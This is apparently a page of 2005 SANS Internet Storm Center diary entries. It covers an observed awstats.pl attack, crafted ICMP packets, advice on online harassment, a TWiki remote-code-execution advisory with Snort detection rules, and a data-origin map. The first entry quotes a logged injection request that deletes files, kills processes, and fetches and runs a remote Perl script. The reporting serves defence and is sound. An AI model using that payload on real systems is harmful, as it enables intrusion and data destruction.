Notes from the DShield Forum

Published: 2005-09-16
Last Updated: 2005-09-18 12:58:56 UTC
by Lenny Zeltser (Version: 1)
0 comment(s)
There were a few posts to the DShield discussion forum today that are worth watching for, even though at the moment they are single observations, and are not part of any trends at the moment.

Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:

[04:06:01 +0100] GET //awstats.pl?configdir=
  |echo%20;cd%20/tmp;rm%20-rf%20*;
  killall%20-9%20perl;wget%20members.lycos.co.uk/mariusbou/a.txt;
  perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -


In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:
16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0, 
flags [none], length: 56)
219.158.8.221 > xx.xx.xx.xx:
icmp 36: time exceeded in-transit for IP
(tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
xx.xx.xx.xx.11582 > 222.168.227.212.80: [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
Keywords:
0 comment(s)

Are you being harassed or stalked online?

Published: 2005-09-16
Last Updated: 2005-09-16 19:30:27 UTC
by Deborah Hale (Version: 3)
0 comment(s)
We received an email today from someone who is concerned
that they are being harassed by someone online. The
individual was asking the Handler's group for help in
finding someone to help her track down an online
attacker.

I wanted to address this issue here. I have investigated
similar claim in the past. Without getting into much
detail about the particular incident (to protect the
identity of both the innocent and the guilty) I want to
discuss my response to those who are concerned about
Cyber Harassment and Stalking.

Is it possible that someone could accomplish this?
Absolutely. Is it likely? - Not under normal
circumstances.

A lot of things could be happening behind the scenes.

* You may have spyware or viruses on your computer that
are allowing certain confidential information to leak
out.

* You may have given someone more information that you
should have in a chat room or email.

* You may have an unprotected computer with lack of
sufficient protection (firewall,anti-virus program,
operating system updates, etc).

In the case that I investigated - the "victim" claimed
that they knew who the people were that were
responsible. There was no evidence that anyone had done
anything to the computer. Nothing more than the
installation of the normal - run of the mill spyware and
adware was found.

It is highly unlikely that this type of activity is
taking place. What is more than likely taking place is
what we see evidence of everyday at the Storm Center and
elsewhere on the Internet. Take a look at the Internet
Storm Center - you will see referenced the Survival Time
and a link to the Survival Time History. The Survival
Time right now - today is 23 minutes. That means that a
computer - unprotected with no firewall, anti virus,
spyware/adware protection will likely become infected in
just 23 minutes. That is all the longer it takes to
compromise a brand spanking new computer - out of the
box. Now take a look at the History link. You see that
we had less than 10 minutes in May 2004 and less than 5
minutes in August 2004 (Blaster).

Take a look at the Top 10 Ports and you will see that
there is continuous port activity. That is the nature of
the Internet with 65,565 ports available you are bound
to see some of them alive doing things like pop mail
(110), web (80), DNS (53), etc.

So what can you do to protect yourself and your
computer?

Here is a link to the Survival Guide. This document
will help you put the things in place to minimize the
potential for someone to break into your computer.

http://isc.sans.org/presentations/xpsurvivalguide.pdf

What do you do if you think you are being harassed?

Don't jump to conclusions.

Contact your local Police Department or your local FBI
office. They can investigate your issues and if they
suspect that you do have a problem they can conduct a
full investigation.

Don't give out personally identifiable information
either online or by telephone if you did not initiate
the contact. Use caution when sharing information with
others - even if you did initiate the contact. Give
only the information that is essential to complete the
transaction or enquiry.

Only you can protect yourself and your identity.

Updates:

Luis Muñoz kindly translated this diary entry into Spanish. You may download the Spanish text here.

Sue Gray sent us a note about the Working to Halt Online Abuse website, which the persons who find themselves abused online may find useful: http://www.haltabuse.org.
Keywords:
0 comment(s)

A TWiki Vulnerability Allows Remote Code Execution

Published: 2005-09-16
Last Updated: 2005-09-16 18:51:30 UTC
by Lenny Zeltser (Version: 2)
0 comment(s)
A recent vulnerability in TWiki software allows remote attackers to execute arbitrary commands on the affected system with the privileges of the Web server process. We received reports that attackers ares beginning to exploit this vulnerability, which increases the severity of this flaw.

To learn more about this problem, and to download a patch, go to:
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev

TWiki is a popular web-based collaboration tool. If you have it installed, we urge you to patch it as soon as possible. We are expecting to see a worm that exploits the recent vulnerability pretty soon.

Chas Tomlin provided us with the following Snort signature, which he put together with help from others:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; uricontent:"/bin/view/Main/TWikiUsers?"; nocase; pcre:"/rev=d+%20/i"; classtype:web-application-activity; reference:url,secunia.com/advisories/16820/; sid:2002366; rev:2;)

This rule is also available from the Bleeding Snort website.

Update: Joel Esler also shared the following signature with us that catches a greater number attack execution paths, and reduces the number of false positives:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC Twiki shell command execution"; flow:to_server,established; uricontent:"/TwikiUsers?rev="; content:"|60|"; classtype:web-application-activity; rev:2;)

This version of the rule will be included in Snort's official rule set.
Keywords:
0 comment(s)

Where does all the data come from?

Published: 2005-09-16
Last Updated: 2005-09-16 03:22:12 UTC
by Deborah Hale (Version: 2)
0 comment(s)
Take a look at the Flash Movie that our own Dr J. put
together. This shows where the data that has been
received at the Dshield Database server in the last 5
minutes originated from.

http://isc.sans.org/packetattack.php

(I particularly like the representation of the data
received from the US - it appears that Johannes too
understands that Iowa is indeed the Center of the US.)
Keywords:
0 comment(s)

Comments


Diary Archives